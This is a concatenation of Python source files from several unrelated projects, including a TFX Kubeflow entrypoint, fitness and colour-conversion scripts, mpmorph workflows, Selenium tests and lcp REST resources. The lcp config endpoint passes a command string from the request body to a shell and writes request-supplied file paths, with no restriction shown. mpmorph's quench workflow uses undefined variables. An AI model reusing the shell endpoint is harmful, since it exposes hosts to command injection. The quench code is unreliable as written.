def __init__(self, component: base_component.BaseComponent,
pipeline_info: data_types.PipelineInfo,
driver_args: data_types.DriverArgs,
metadata_connection_config: metadata_store_pb2.ConnectionConfig,
additional_pipeline_args: Dict[Text, Any]):
"""Initialize a ComponentLauncher.
Args:
component: The component to launch.
pipeline_info: An instance of data_types.PipelineInfo that holds pipeline
properties.
driver_args: An instance of data_types.DriverArgs that holds component
specific driver args.
metadata_connection_config: ML metadata connection config.
additional_pipeline_args: Additional pipeline args, includes,
- beam_pipeline_args: Beam pipeline args for beam jobs within executor.
Executor will use beam DirectRunner as Default.
"""
component_info = data_types.ComponentInfo(
component_type=component.component_type,
component_id=component.component_id)
super(ComponentLauncher, self).__init__(
component_info=component_info,
driver_class=component.driver_class,
component_executor_spec=component.executor_spec,
input_dict=component.inputs.get_all(),
output_dict=component.outputs.get_all(),
exec_properties=component.exec_properties,
pipeline_info=pipeline_info,
driver_args=driver_args,
metadata_connection_config=metadata_connection_config,
additional_pipeline_args=additional_pipeline_args)
```
#### File: orchestration/kubeflow/container_entrypoint.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import json
import logging
import os
import sys
import tensorflow as tf
from typing import Any, Dict, Text
from ml_metadata.proto import metadata_store_pb2
from tfx.orchestration import component_launcher
from tfx.orchestration import data_types
from tfx.orchestration.kubeflow.proto import kubeflow_pb2
from tfx.types import artifact_utils
from tfx.types import channel
from tfx.utils import import_utils
from tfx.utils import json_utils
from google.protobuf import json_format
def _get_config_value(config_value: kubeflow_pb2.ConfigValue) -> Text:
value_from = config_value.WhichOneof('value_from')
if value_from is None:
raise ValueError('No value set in config value: {}'.format(config_value))
if value_from == 'value':
return config_value.value
return os.getenv(config_value.environment_variable)
# TODO(ajaygopinathan): Add unit tests for these helper functions.
def _get_metadata_connection_config(
kubeflow_metadata_config: kubeflow_pb2.KubeflowMetadataConfig
) -> metadata_store_pb2.ConnectionConfig:
"""Constructs a metadata connection config.
Args:
kubeflow_metadata_config: Configuration parameters to use for constructing a
valid metadata connection config in a Kubeflow cluster.
Returns:
A metadata_store_pb2.ConnectionConfig object.
"""
connection_config = metadata_store_pb2.ConnectionConfig()
connection_config.mysql.host = _get_config_value(
kubeflow_metadata_config.mysql_db_service_host)
connection_config.mysql.port = int(
_get_config_value(kubeflow_metadata_config.mysql_db_service_port))
connection_config.mysql.database = _get_config_value(
kubeflow_metadata_config.mysql_db_name)
connection_config.mysql.user = _get_config_value(
kubeflow_metadata_config.mysql_db_user)
connection_config.mysql.password = _get_config_value(
kubeflow_metadata_config.mysql_db_password)
return connection_config
def _make_channel_dict(artifact_dict: Dict[Text, Text]
) -> Dict[Text, channel.Channel]:
"""Makes a dictionary of artifact channels from a dictionary of artifacts.
Args:
artifact_dict: Dictionary of artifacts.
Returns:
Dictionary of artifact channels.
Raises:
RuntimeError: If list of artifacts is malformed.
"""
channel_dict = {}
for name, artifact_list in artifact_dict.items():
if not artifact_list:
raise RuntimeError(
'Found empty list of artifacts for input/output named {}: {}'.format(
name, artifact_list))
type_name = artifact_list[0].type_name
channel_dict[name] = channel.Channel(
type_name=type_name, artifacts=artifact_list)
return channel_dict
def _make_additional_pipeline_args(json_additional_pipeline_args: Text
) -> Dict[Text, Any]:
"""Constructs additional_pipeline_args for ComponentLauncher.
Currently, this mainly involves parsing and constructing `beam_pipeline_args`.
Args:
json_additional_pipeline_args: JSON serialized dictionary of additional
pipeline args.
Returns:
Dictionary containing `additional_pipeline_args`.
"""
additional_pipeline_args = json.loads(json_additional_pipeline_args)
# Ensure beam pipelines args has a setup.py file so we can use
# DataflowRunner.
beam_pipeline_args = additional_pipeline_args.get('beam_pipeline_args', [])
module_dir = os.environ['TFX_SRC_DIR']
setup_file = os.path.join(module_dir, 'setup.py')
tf.logging.info('Using setup_file \'%s\' to capture TFX dependencies',
setup_file)
beam_pipeline_args.append('--setup_file={}'.format(setup_file))
additional_pipeline_args['beam_pipeline_args'] = beam_pipeline_args
return additional_pipeline_args
def main():
# Log to the container's stdout so Kubeflow Pipelines UI can display logs to
# the user.
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument('--pipeline_name', type=str, required=True)
parser.add_argument('--pipeline_root', type=str, required=True)
parser.add_argument('--kubeflow_metadata_config', type=str, required=True)
parser.add_argument('--additional_pipeline_args', type=str, required=True)
parser.add_argument('--component_id', type=str, required=True)
parser.add_argument('--component_type', type=str, required=True)
parser.add_argument('--driver_class_path', type=str, required=True)
parser.add_argument('--executor_spec', type=str, required=True)
parser.add_argument('--inputs', type=str, required=True)
parser.add_argument('--outputs', type=str, required=True)
parser.add_argument('--exec_properties', type=str, required=True)
parser.add_argument('--enable_cache', action='store_true')
args = parser.parse_args()
inputs = artifact_utils.parse_artifact_dict(args.inputs)
input_dict = _make_channel_dict(inputs)
outputs = artifact_utils.parse_artifact_dict(args.outputs)
output_dict = _make_channel_dict(outputs)
exec_properties = json.loads(args.exec_properties)
driver_class = import_utils.import_class_by_path(args.driver_class_path)
executor_spec = json_utils.loads(args.executor_spec)
kubeflow_metadata_config = kubeflow_pb2.KubeflowMetadataConfig()
json_format.Parse(args.kubeflow_metadata_config, kubeflow_metadata_config)
connection_config = _get_metadata_connection_config(kubeflow_metadata_config)
component_info = data_types.ComponentInfo(
component_type=args.component_type, component_id=args.component_id)
driver_args = data_types.DriverArgs(enable_cache=args.enable_cache)
additional_pipeline_args = _make_additional_pipeline_args(
args.additional_pipeline_args)
launcher = component_launcher.BaseComponentLauncher(
component_info=component_info,
driver_class=driver_class,
component_executor_spec=executor_spec,
input_dict=input_dict,
output_dict=output_dict,
exec_properties=exec_properties,
pipeline_info=data_types.PipelineInfo(
pipeline_name=args.pipeline_name,
pipeline_root=args.pipeline_root,
run_id=os.environ['WORKFLOW_ID']),
driver_args=driver_args,
metadata_connection_config=connection_config,
additional_pipeline_args=additional_pipeline_args)
launcher.launch()
if __name__ == '__main__':
main()
``` |
{
"source": "JibRay/runsPlot",
"score": 3
} |
#### File: JibRay/runsPlot/runsPlot.py
```python
from mpl_toolkits import mplot3d
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
#from matplotlib.ticker import LinearLocator, FormatStrFormatter
import argparse
import datetime
from datetime import date
#============================================================================
# Globals
version = 4
#Input file field index values.
TYPE = 0
TIME_STAMP = 1
DISTANCE = 4
TIME = 6
#============================================================================
# Classes
# A class to hold a run event.
class Event:
def __init__(self, _timeStamp, _distance, _pace):
self.timeStamp = _timeStamp # date.
self.day = 0 # Day count from first run.
self.distance = _distance # In miles.
self.pace = _pace # In minutes per mile.
# A class to hold all the runs.
class Runs:
def __init__(self):
self.inputEvents = np.array([], dtype = Event)
self.day = []
self.distance = []
self.pace = []
def length(self):
return len(self.inputEvents)
# For each run in the file at path, load date, distance and pace. Pace is
# computed from distance and time.
def load(self, path):
values = []
self.__init__()
with open(path) as inputFile:
# Skip the header line.
inputFile.readline()
for line in inputFile:
text = self.removeQuotesAndCommas(line)
values = text.split(',')
# Load only running events.
if values[TYPE] == 'Running':
# From values, get date, distance in miles.
runDate = date.fromisoformat(values[TIME_STAMP].split()[0])
runDistance = float(values[DISTANCE])
# To get run pace, first convert time (hh:mm:ss) to minutes, then
# compute pace (minutes/mile).
h, m, s = values[TIME].split(':')
t = 60.0 * float(h) + float(m) + (float(s) / 60.0)
runPace = t / runDistance
# Exclude outliers.
if runDistance >= 2.0 and runDistance <= 27.0 \
and runPace > 4.0 and runPace < 20.0:
self.inputEvents = np.append(self.inputEvents, \
Event(runDate, runDistance, runPace))
# Computer the day numbers.
firstDay = self.inputEvents[len(self.inputEvents) - 1].timeStamp
for event in self.inputEvents:
event.day = (event.timeStamp - firstDay).days
def fitPlane(self):
# Create the arrays needed for the fit.
self.day = []
self.distance = []
self.pace = []
for event in self.inputEvents:
self.day.append(event.day);
self.distance.append(event.distance);
self.pace.append(event.pace);
tmp_A = []
tmp_b = []
for i in range(len(self.day)):
tmp_A.append([self.day[i], self.distance[i], 1])
tmp_b.append(self.pace[i])
b = np.matrix(tmp_b).T
A = np.matrix(tmp_A)
self.fit = (A.T * A).I * A.T *b
errors = b - A * self.fit
residual = np.linalg.norm(errors)
print("solution:")
print(" %f x + %f y + %f = z" %(self.fit[0], self.fit[1], self.fit[2]))
# print("errors:")
# print(" ", errors)
print("residual:")
print(" ", residual)
def plot(self):
fig = plt.figure()
ax = plt.subplot(111, projection = '3d')
ax.scatter(self.day, self.distance, self.pace, color = 'b')
xlim = ax.get_xlim()
ylim = ax.get_ylim()
X, Y = np.meshgrid(np.arange(xlim[0], xlim[1]), \
np.arange(ylim[0], ylim[1]))
Z = np.zeros(X.shape)
for r in range(X.shape[0]):
for c in range(X.shape[1]):
Z[r,c] = self.fit[0] * X[r,c] + self.fit[1] * Y[r,c] + self.fit[2]
ax.plot_wireframe(X, Y, Z, color = 'y')
ax.set_xlabel('Days since ' + \
self.inputEvents[len(self.inputEvents)-1].timeStamp.strftime("%m-%d-%Y"))
ax.set_ylabel('Distance - miles')
ax.set_zlabel('Pace - min/mile')
plt.show()
# Remove commas embedded in quoted strings. Remove quotes from strings.
# Return the modified string.
def removeQuotesAndCommas(self, inputText):
inQuotes = False
outputText = ''
for c in inputText:
if inQuotes:
if c == '"':
inQuotes = False
elif c != ',':
outputText += c
else:
if c == '"':
inQuotes = True
else:
outputText += c
return outputText
#============================================================================
# Functions
def displayVersion():
print("runsPlot version " + str(version))
quit()
#============================================================================
# Main program
parser = argparse.ArgumentParser(description = \
"Plot pace vs time and length of run")
parser.add_argument('inputFile', type = str, help = 'Input file path')
parser.add_argument('-v', '--version', action = 'store_true', \
help = 'Display version and quit')
args = parser.parse_args()
if args.version:
displayVersion()
runs = Runs()
runs.load(args.inputFile)
print("Total number of runs = ", runs.length())
runs.fitPlane()
runs.plot()
``` |
{
"source": "jibsen/tmcolorconv",
"score": 2
} |
#### File: jibsen/tmcolorconv/tmcolorconv.py
```python
import argparse
import collections
import math
import operator
import plistlib
import re
# Generated using mkconvmatrix.py
GenericRGBtosRGB = [[1.0252482, -0.0265428, 0.0012946],
[0.0193970, 0.9480316, 0.0325714],
[-0.0017702, -0.0014426, 1.0032128]]
def mat_vec_mul(M, v):
"""Multiply matrix by vector."""
return [sum(map(operator.mul, r, v)) for r in M]
def str_to_color(s):
"""Convert hex string to color value."""
if len(s) == 3:
s = ''.join(c + c for c in s)
values = bytes.fromhex(s)
# Scale from [0-255] to [0-1]
return [c / 255.0 for c in values]
def color_to_str(C):
"""Convert color value to hex string."""
# Scale from [0-1] to [0-255]
V = [int(round(c * 255)) for c in C]
# Clamp values to [0-255]
for i in range(len(V)):
V[i] = max(min(V[i], 255), 0)
return '#{:02X}{:02X}{:02X}'.format(V[0], V[1], V[2])
def alpha_blend(color, base, alpha):
"""Blend color and base based on alpha."""
return [c * alpha + b * (1 - alpha) for c, b in zip(color, base)]
def sRGB_compand(c):
if c <= 0.0031308:
return 12.92 * c
else:
return 1.055 * math.pow(c, 1 / 2.4) - 0.055
def convert_color(Vin, gamma):
"""Convert color Vin from Generic RGB to sRGB."""
# Linearize
v = [math.pow(c, gamma) for c in Vin]
v_srgb = mat_vec_mul(GenericRGBtosRGB, v)
# sRGB companding
Vout = list(map(sRGB_compand, v_srgb))
return Vout
def convert_scheme(scheme, gamma, blend_alpha):
"""Convert colors in scheme from Generic RGB to sRGB.
Args:
scheme: tmTheme loaded through plistlib.
gamma (float): Gamma value of colors.
blend_alpha (bool): If True, colors with alpha are blended, otherwise
the alpha value is copied.
Returns:
Converted scheme.
"""
bg = [0, 0, 0]
fg = [0, 0, 0]
if gamma == 2.2:
gamma = 563 / 256.0
elif gamma == 1.8:
gamma = 461 / 256.0
for idx, entry in enumerate(scheme['settings']):
for k, v in entry['settings'].items():
# Match 6 digit hex color with optional alpha
match = re.match('#([0-9a-fA-F]{6})([0-9a-fA-F]{2})?', v)
# Match 3 digit hex color
if not match:
match = re.match('#([0-9a-fA-F]{3})', v)
if match:
color = str_to_color(match.group(1))
alpha_str = match.group(2)
# Blend alpha if present
if blend_alpha and alpha_str:
alpha = int(alpha_str, 16) / 255.0
alpha_str = None
if k in ('background', 'lineHighlight', 'selection'):
color = alpha_blend(color, bg, alpha)
else:
color = alpha_blend(color, fg, alpha)
# Update fg and bg if in editor settings
if idx == 0:
if k == 'foreground':
fg = color
elif k == 'background':
bg = color
# Update hex color in scheme
color_str = color_to_str(convert_color(color, gamma))
color_str += alpha_str or ''
scheme['settings'][idx]['settings'][k] = color_str
return scheme
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert Generic RGB to sRGB.')
parser.add_argument('infile', type=argparse.FileType('rb'),
help='input tmTheme file')
parser.add_argument('outfile', type=argparse.FileType('wb'),
help='output tmTheme file')
parser.add_argument('-g', '--gamma', type=float, default=1.8,
help='input gamma (default 1.8)')
parser.add_argument('-b', action='store_true',
help='blend alpha')
args = parser.parse_args()
scheme = plistlib.load(args.infile, dict_type=collections.OrderedDict)
if scheme.get('colorSpaceName') == 'sRGB':
print('Warning: colorSpaceName key is already sRGB')
else:
scheme['colorSpaceName'] = 'sRGB'
convert_scheme(scheme, args.gamma, args.b)
plistlib.dump(scheme, args.outfile, sort_keys=False)
``` |
{
"source": "jic198/mpmorph",
"score": 3
} |
#### File: mpmorph/fireworks/powerups.py
```python
from mpmorph.firetasks.dbtasks import VaspMDToDb, TrajectoryDBTask
from mpmorph.firetasks.glue_tasks import PreviousStructureTask, SaveStructureTask, \
PassPVTask
from mpmorph.firetasks.mdtasks import RescaleVolumeTask, ConvergeTask, PVRescaleTask, \
DiffusionTask
__author__ = '<NAME> and <NAME>'
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def add_diffusion_task(fw, **kwargs):
spawner_task = DiffusionTask(**kwargs)
fw.tasks.append(spawner_task)
return fw
def add_converge_task(fw, **kwargs):
"""
This powerup adds the convergence task onto a MD firework, which turns a workflow into a dynamic workflow.
This firetask will check to ensure the specified parameters (Usually pressure and Energy) are converged within the
specified thresholds.
:param fw:
:param kwargs:
:return:
"""
spawner_task = ConvergeTask(**kwargs)
fw.tasks.append(spawner_task)
return fw
def aggregate_trajectory(fw, **kwargs):
"""
This firetask will add a task which converts a series of MD runs into a trajectory object
:param fw:
:param kwargs:
:return:
"""
fw.tasks.append(TrajectoryDBTask(**kwargs))
return fw
def add_cont_structure(fw):
prev_struct_task = PreviousStructureTask()
insert_i = 2
for (i, task) in enumerate(fw.tasks):
if task.fw_name == "{{atomate.vasp.firetasks.run_calc.RunVaspCustodian}}":
insert_i = i
break
fw.tasks.insert(insert_i, prev_struct_task)
return fw
def add_pass_structure(fw, **kwargs):
save_struct_task = SaveStructureTask(**kwargs)
fw.tasks.append(save_struct_task)
return fw
def add_pass_pv(fw, **kwargs):
pass_pv_task = PassPVTask(**kwargs)
fw.tasks.append(pass_pv_task)
return fw
def add_pv_volume_rescale(fw):
insert_i = 2
for (i, task) in enumerate(fw.tasks):
if task.fw_name == "{{atomate.vasp.firetasks.run_calc.RunVaspCustodian}}":
insert_i = i
break
fw.tasks.insert(insert_i, PVRescaleTask())
return fw
def add_rescale_volume(fw, **kwargs):
rsv_task = RescaleVolumeTask(**kwargs)
insert_i = 2
for (i, task) in enumerate(fw.tasks):
if task.fw_name == "{{atomate.vasp.firetasks.run_calc.RunVaspCustodian}}":
insert_i = i
break
fw.tasks.insert(insert_i, rsv_task)
return fw
def replace_pass_structure(fw, **kwargs):
# look for rescale_volume task
replaced = False
fw_dict = fw.to_dict()
for i in range(len(fw_dict['spec']['_tasks'])):
if fw_dict['spec']['_tasks'][i]["_fw_name"] == '{{mpmorph.firetasks.glue_tasks.SaveStructureTask}}':
del fw_dict['spec']['_tasks'][i]["_fw_name"]
fw.tasks[i] = SaveStructureTask(**kwargs)
replaced = True
break
# TODO: Replace with real error handling
if replaced == False:
print("error, no SaveStructureTask to replace")
return
return fw
def replace_vaspmdtodb(fw):
# look for vaspdb task
replaced = False
fw_dict = fw.to_dict()
for i in range(len(fw_dict['spec']['_tasks'])):
if fw_dict['spec']['_tasks'][i]["_fw_name"] == '{{atomate.vasp.firetasks.parse_outputs.VaspToDb}}':
del fw_dict['spec']['_tasks'][i]["_fw_name"]
fw.tasks[i] = VaspMDToDb(**fw_dict['spec']['_tasks'][i])
replaced = True
break
# TODO: Replace with real error handling
if replaced == False:
print("error, no vasptodb to replace")
return
return fw
```
#### File: mpmorph/workflows/quench.py
```python
import numpy as np
from atomate.vasp.fireworks.core import OptimizeFW
from fireworks import Workflow
from mpmorph.fireworks import powerups
from mpmorph.fireworks.core import StaticFW, MDFW
from mpmorph.util import recursive_update
__author__ = '<NAME> and <NAME>'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
def get_quench_wf(structures, temperatures={}, priority=None, quench_type="slow_quench", cool_args={}, hold_args={},
quench_args={},
descriptor="", **kwargs):
fw_list = []
temp = {"start_temp": 3000, "end_temp": 500, "temp_step": 500} if temp is None else temp
cool_args = {"md_params": {"nsteps": 200}} if cool_args is None else cool_args
hold_args = {"md_params": {"nsteps": 500}} if hold_args is None else hold_args
quench_args = {} if quench_args is None else quench_args
for (i, structure) in enumerate(structures):
_fw_list = []
if quench_type == "slow_quench":
for temp in np.arange(temperatures["start_temp"], temperatures["end_temp"], -temperatures["temp_step"]):
# get fw for cool step
use_prev_structure = False
if len(_fw_list) > 0:
use_prev_structure = True
_fw = get_MDFW(structure, t, t - temp["temp_step"],
name="snap_" + str(i) + "_cool_" + str(t - temp["temp_step"]),
args=cool_args, parents=[_fw_list[-1]] if len(_fw_list) > 0 else [],
priority=priority, previous_structure=use_prev_structure,
insert_db=True, **kwargs)
_fw_list.append(_fw)
# get fw for hold step
_fw = get_MDFW(structure, t - temp["temp_step"], t - temp["temp_step"],
name="snap_" + str(i) + "_hold_" + str(t - temp["temp_step"]),
args=hold_args, parents=[_fw_list[-1]], priority=priority,
previous_structure=True, insert_db=True, **kwargs)
_fw_list.append(_fw)
if quench_type in ["slow_quench", "mp_quench"]:
# Relax OptimizeFW and StaticFW
run_args = {"run_specs": {"vasp_input_set": None, "vasp_cmd": ">>vasp_cmd<<",
"db_file": ">>db_file<<",
"spec": {"_priority": priority}
},
"optional_fw_params": {"override_default_vasp_params": {}}
}
run_args = recursive_update(run_args, quench_args)
_name = "snap_" + str(i)
fw1 = OptimizeFW(structure=structure, name=_name + descriptor + "_optimize",
parents=[_fw_list[-1]] if len(_fw_list) > 0 else [],
**run_args["run_specs"], **run_args["optional_fw_params"],
max_force_threshold=None)
if len(_fw_list) > 0:
fw1 = powerups.add_cont_structure(fw1)
fw1 = powerups.add_pass_structure(fw1)
fw2 = StaticFW(structure=structure, name=_name + descriptor + "_static",
parents=[fw1], **run_args["run_specs"],
**run_args["optional_fw_params"])
fw2 = powerups.add_cont_structure(fw2)
fw2 = powerups.add_pass_structure(fw2)
_fw_list.extend([fw1, fw2])
fw_list.extend(_fw_list)
name = structure.composition.reduced_formula + descriptor + "_quench"
wf = Workflow(fw_list, name=name)
return wf
def get_MDFW(structure, start_temp, end_temp, name="molecular dynamics", priority=None, job_time=None, args={},
**kwargs):
run_args = {"md_params": {"nsteps": 500},
"run_specs": {"vasp_input_set": None, "vasp_cmd": ">>vasp_cmd<<", "db_file": ">>db_file<<",
"wall_time": 40000},
"optional_fw_params": {"override_default_vasp_params": {}, "spec": {}}}
run_args["optional_fw_params"]["override_default_vasp_params"].update(
{'user_incar_settings': {'ISIF': 1, 'LWAVE': False, 'PREC': 'Low'}})
run_args = recursive_update(run_args, args)
_mdfw = MDFW(structure=structure, name=name, **run_args["md_params"],
**run_args["run_specs"], **run_args["optional_fw_params"], **kwargs)
return _mdfw
``` |
{
"source": "jicaiyunshang/jicaiauto",
"score": 2
} |
#### File: test/WebTest/test_Jicai_WebUI.py
```python
__author__ = 'Tser'
__email__ = '<EMAIL>'
__project__ = 'jicaiauto'
__script__ = 'testJicai.py'
__create_time__ = '2020/7/15 23:34'
from jicaiauto.jicaiauto import web_action
from jicaiauto.utils.jicaiautoEmail import send_email
from jicaiauto.data.GLO_VARS import PUBLIC_VARS
from jicaiauto.config.config import EMAILCONFIG
from os import path
from time import sleep
import pytest
emil = {
'sender' : '<EMAIL>',
'receiver' : '<EMAIL>',
'smtpserver': 'smtp.163.com',
'smtp_port' : 25,
'username' : 'username',
'password' : 'password',
'subject' : '吉彩云尚自动化测试报告',
'report' : 'report.html'
}
PUBLIC_VARS.update(emil)
@pytest.mark.jicai_web
def test_manzhai_Case1(browser):
web_action(browser, cmd='打开', loc='', data='http://www.baidu.com')
web_action(browser, '输入', '//*[@id="kw"]', '小白科技')
web_action(browser, '点击', '//*[@id="su"]')
web_action(browser, '停止时间', data=3)
web_action(browser, '标题', contains_assert='小白')
@pytest.mark.jicai_web
def test_manzhai_Case2(browser):
web_action(browser, cmd='打开', loc='', data='https://www.baidu.com')
web_action(browser, '输入', '//*[@id="kw"]', '吉彩云尚')
web_action(browser, '点击', '//*[@id="su"]')
web_action(browser, '停止时间', data=3)
web_action(browser, '标题', contains_assert='吉彩-')
web_action(browser, '关闭')
@pytest.mark.last
def test_last():
''' 本次结束测试结束,发送邮件 '''
print('测试结束了,发个邮件吧')
sleep(5)
_emil = EMAILCONFIG()
_cur_path = path.abspath(path.curdir)
print(PUBLIC_VARS)
print(_emil)
if 'report' in PUBLIC_VARS.keys() and '' != PUBLIC_VARS['report']:
if path.isfile(_cur_path + '/' + PUBLIC_VARS['report']):
send_email(_cur_path + '/' + PUBLIC_VARS['report'])
elif '' != _emil.report:
if path.isfile(_cur_path + '/' + _emil.report):
send_email(_cur_path + '/' + _emil.report)
@pytest.mark.run(order=1)
def test_first():
print('测试开始了')
```
#### File: jicaiauto/utils/jicaiautodb.py
```python
__author__ = 'Tser'
__email__ = '<EMAIL>'
__project__ = 'jicaiauto'
__script__ = 'init_db.py'
__create_time__ = '2020/7/2 21:45'
from sqlite3 import connect
from jicaiauto.config.config import DBCONFIG
class DB(object):
def __init__(self):
self.conn = connect(DBCONFIG().dbpath)
self.cur = self.conn.cursor()
def select(self, sql=None, parames=None, *args, **kwargs):
return self.cur.execute(sql).fetchall()
def update(self, sql=None, parames=None, *args, **kwargs):
self.cur.execute(sql)
self.conn.commit()
def __del__(self):
self.cur.close()
self.conn.close()
``` |
{
"source": "jicarretero/lcp",
"score": 3
} |
#### File: lcp/api/error_handler.py
```python
from falcon.errors import HTTPBadRequest as HTTP_Bad_Request
from falcon.errors import HTTPInternalServerError as HTTP_Internal_Server_Error
from falcon.errors import HTTPUnsupportedMediaType as HTTP_Unsupported_Media_Type
from lib.response import Bad_Request_Response, Internal_Server_Error_Response, Unsupported_Media_Type_Response
class Base_Handler(object):
@classmethod
def handler(cls, req, resp, ex, params):
cls.response(exception=ex).apply(resp)
resp.complete = True
@classmethod
def get(cls):
return cls.error, cls.handler
class Bad_Request_Handler(Base_Handler):
error = HTTP_Bad_Request
response = Bad_Request_Response
class Internal_Server_Error_Handler(Base_Handler):
error = HTTP_Internal_Server_Error
response = Internal_Server_Error_Response
class Unsupported_Media_Type_Handler(Base_Handler):
error = HTTP_Unsupported_Media_Type
response = Unsupported_Media_Type_Response
```
#### File: lcp/api/middleware.py
```python
class Negotiation_Middleware(object):
def process_request(self, req, resp):
resp.content_type = req.content_type
```
#### File: lcp/extra/extra_utils.py
```python
from urllib.parse import urlparse
HTTP_SCHEME = "http"
HTTPS_SCHEME = "https"
class UrlSchemaData:
def __init__(self, url):
r = urlparse(url)
self.scheme = r.scheme
self.netloc = r.netloc
self.port = 0
self.host = ""
self.https = False
self.get_port()
def get_port(self):
try:
self.host, port = self.netloc.split(":", 1)
self.port = int(port)
except ValueError:
self.host = self.netloc
if self.scheme == HTTPS_SCHEME:
self.port = 443
else:
self.port = 80
if self.scheme == HTTPS_SCHEME:
self.https = True
```
#### File: lcp/resource/config.py
```python
import subprocess as sp
import time
from os.path import expanduser as expand_user
from resource.base import Base_Resource
from docstring import docstring
from lib.http import HTTP_Method
from lib.parser import json_parser, property_parser, xml_parser, yaml_parser
from lib.response import Bad_Request_Response, Base_Response, Content_Response, No_Content_Response, Not_Found_Response
from schema.config import (Config_Action_Response_Schema, Config_Parameter_Response_Schema, Config_Request_Schema,
Config_Resource_Response_Schema)
from utils.datetime import datetime_to_str
from utils.exception import extract_info
from utils.json import loads
from utils.sequence import is_list, wrap
File_Not_Found_Error = FileNotFoundError
class Config_Resource(Base_Resource):
tag = {'name': 'config', 'description': 'Configuration at run-time.'}
routes = '/config',
parsers = {'json': json_parser, 'properties': property_parser, 'xml': xml_parser, 'yaml': yaml_parser}
@docstring(source='config/post.yaml')
def on_post(self, req, resp):
req_data = req.media or {}
resp_data, valid = Config_Request_Schema(many=is_list(req_data),
method=HTTP_Method.POST).validate(data=req_data)
if valid:
req_data_wrap = wrap(req_data)
if len(req_data_wrap) > 0:
for config in req_data_wrap:
for cfg, cfg_list in config.items():
for data in wrap(cfg_list):
output = {}
if cfg == 'actions':
output = self.__actions(data)
schema = Config_Action_Response_Schema
elif cfg == 'parameters':
output = self.__parameters(data)
schema = Config_Parameter_Response_Schema
elif cfg == 'resources':
output = self.__resources(data)
schema = Config_Resource_Response_Schema
if isinstance(output, Base_Response):
output.add(resp)
else:
output_data = data.copy()
id = output_data.pop('id', None)
output.update(id=id, data=output_data, timestamp=datetime_to_str())
resp_data, valid = schema(many=False, method=HTTP_Method.POST,
unknown='INCLUDE').validate(data=output)
if valid:
Content_Response(output).add(resp)
else:
resp_data.add(resp)
else:
msg = 'No content to apply configurations with the {{request}}'
No_Content_Response(msg, request=req_data).apply(resp)
else:
resp_data.apply(resp)
def __actions(self, data):
cmd = data.get('cmd', None)
daemon = data.get('daemon', False)
output_format = data.get('output_format', 'plain')
output = {'type': 'action'}
run = ' '.join([cmd] + wrap(data.get('args', [])))
start = time.time()
proc = self.__run_cmd(cmd=run, daemon=daemon, output=output)
if daemon:
output.update(error=False, return_code=0)
else:
output.update(error=proc.returncode != 0,
return_code=proc.returncode, duration=time.time() - start)
self.__set_std(proc.stdout, output, 'stdout', output_format)
self.__set_std(proc.stderr, output, 'stderr', output_format)
return output
def __parameters(self, data):
schema = data.get('schema', None)
source = data.get('source', None)
path = wrap(data.get('path', []))
value = data.get('value', None)
output = {'type': 'parameter'}
try:
source = expand_user(source)
output.update(self.parsers.get(schema)(schema, source, path, value))
return output
except File_Not_Found_Error as e:
msg = f'Source {source} not found'
self.log.exception(msg, e)
return Not_Found_Response(msg, e, type='parameter', data=data)
except Exception as e:
msg = f'Source {source} not accessible'
self.log.exception(msg, e)
return Bad_Request_Response(e, message=msg, type='parameter', data=data)
def __resources(self, data):
path = data.get('path', None)
content = data.get('content', None)
output = {'type': 'resource'}
try:
fix_path = expand_user(path)
with open(fix_path, "w") as file:
file.write(content)
output.update(path=path, content=content)
return output
except FileNotFoundError as e:
msg = f'Path {path} not found'
self.log.exception(msg, e)
return Not_Found_Response(msg, e, type='resource', data=data)
except Exception as e:
msg = f'Path {path} not accessible'
self.log.exception(msg, e)
return Bad_Request_Response(e, message=msg, type='resource', data=data)
def __set_std(self, data, output, key, output_format):
if data:
data = data.strip()
if output_format == 'plain':
output[key] = data
elif output_format == 'lines':
output[key] = data.splitlines()
else:
try:
output[key] = loads(data)
except Exception as e:
msg = f'Not valid JSON for {key}'
self.log.exception(msg, e)
output.update(description=msg, exception=extract_info(e))
output[key] = data
def __run_cmd(self, cmd, daemon, output):
if not daemon:
return sp.run(cmd, check=False, shell=True,
stdout=sp.PIPE, stderr=sp.PIPE, universal_newlines=True)
else:
return sp.Popen(cmd, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, start_new_session=True)
```
#### File: lcp/resource/security_functions.py
```python
from schema.security_functions import Agent as AgentSchema
from schema.security_functions import AgentType
from docstring import docstring
from resource.base import Base_Resource
import json
from marshmallow.exceptions import ValidationError
from falcon import HTTP_CREATED, HTTP_NOT_ACCEPTABLE, HTTP_NOT_FOUND, HTTP_PRECONDITION_FAILED
from extra.lcp_config import LCPConfig
from extra.controller import LCPController
class SecurityFunction(Base_Resource):
tag = {'name': 'Agents',
'description': 'Describes the Agent types and Agent instances.'}
routes = '/agent/instance',
def __init__(self):
pass
@docstring(source='Agents/GetAgentInstanceResource.yml')
def on_get(self, req, resp):
# resp_data, valid = SecurityFunctionSchema(method=HTTP_Method.GET) \
# .validate(data={})
resp.body = json.dumps(LCPConfig().agents)
@docstring(source='Agents/PostAgentInstanceResource.yml')
def on_post(self, req, resp):
# resp_data, valid = AgentSchema(method=HTTP_Method.POST) \
# .validate(data={})
payload = req.media if isinstance(req.media, list) else [req.media]
try:
ag_schema = AgentSchema(many=True)
ag_schema.load(payload)
controller = LCPController()
for e in payload:
try:
controller.set_agent_instance(e)
except KeyError:
resp.body = '{"error": "agent_type "' + e['type'] + ' not found"}'
resp.status = HTTP_NOT_FOUND
return
resp.status = HTTP_CREATED
except ValidationError as e:
resp.body = json.dumps(e.messages)
req.status = HTTP_NOT_ACCEPTABLE
class SecurityFunctionbyId(Base_Resource):
tag = {'name': 'Agents',
'description': 'Describes the Agent types and Agent instances.'}
routes = '/agent/instance/{id}',
def __init__(self):
pass
@docstring(source='Agents/PutAgentInstanceResource.yml')
def on_put(self, req, resp, id):
req.status = HTTP_NOT_FOUND
@docstring(source='Agents/DeleteAgentInstanceResource.yml')
def on_delete(self, req, resp, id):
req.status = HTTP_NOT_FOUND
class AgentTypeResource(Base_Resource):
tag = {'name': 'Agents',
'description': 'Describes the Agent types and Agent instances.'}
routes = '/agent/type',
@docstring(source="Agents/GetAgentTypeResource.yml")
